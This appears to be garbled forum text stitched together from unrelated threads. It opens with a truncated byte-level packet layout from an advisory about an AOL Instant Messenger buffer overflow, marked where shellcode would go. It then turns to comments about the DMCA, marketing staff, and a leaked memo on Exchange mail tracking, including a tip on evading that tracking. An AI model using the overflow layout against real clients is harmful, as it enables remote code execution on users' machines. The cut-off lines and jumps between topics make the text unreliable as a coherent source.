[\x00\x07] TLV type (0x07)
[\x00\x4d] TLV length (77 bytes)
["aim:AddGame?name=w00w00&go1st=true&multiplaye
[\x27\x11] TLV type (0x2711)
[\x06\xbf] TLV length (22 + length of our shellcode = 1727 bytes)
[\x00\x00\x02\x00\x05\x07\x4c\x7f\x11\xd1\x82\x
\x54\x00\x00\x00\x0b\x00\x09 + shellcode starts here]
References:
Robbie Saunders
Evan Brewer
The guy spends most of his time bashing the DMCA and how hard it makes to offer patches to this sort of thing without AOL's permission:
From the NTBugtraq letter:
First, the Digital Millenium Copyright Act affects circumvention of anti-piracy mechanisms and reverse engineering. If a product is released in binary form only (i.e., AOL) to protect its technologies and one attempts to reverse engineer the file, it's a violation of the DMCA. It's no question who the lobbyists behind this law were: the big corporations. Not surprisingly, AOL Time Warner was one of the DMCA's biggest supporters. Find out more information about the DMCA at http://www.anti-dmca.org.
Remember that you're talking about marketing people here. They may be more dense at MS than elsewhere, but remember that these are the same guys who invented the practice of talking about and selling software project they can't and won't understand, let alone operate.
I work at a company where the marketing people are responisble for coming up with and selling software concepts to customers, yet are unable to unzip screenshots of the applications they're seelling or extract those screenshots from email attachments.
These people are college educated?
For those of you who don't know, the best way to get around Exchange's ability to track this sort of mail is a simple 'cut and paste' operation into a non-MS mail client.
I beleive that in most Exchange installations, you can also pop mail with any given non-MS pop client, Eudora, MozMail, Elm, Pine, or even Hotmail.
PS: I used to run Exchange -- so if you think I am not tracking this message, think again. Don't forward it! And if you have forward rules that have forwarded this message, then perhaps you should think again about forwarding internal email with those rules. I want to give you folks all the information I can in a very open way. If we continue to have bad apples or careless people out there, I will not be able to help you by sending this kind of information!
This reads a lot like 'Our Company is great and wonderful! Anyone who says different will be punished!'
Seriously, with this kind of mentality, its a wonder that more emails of this nature are not leaked.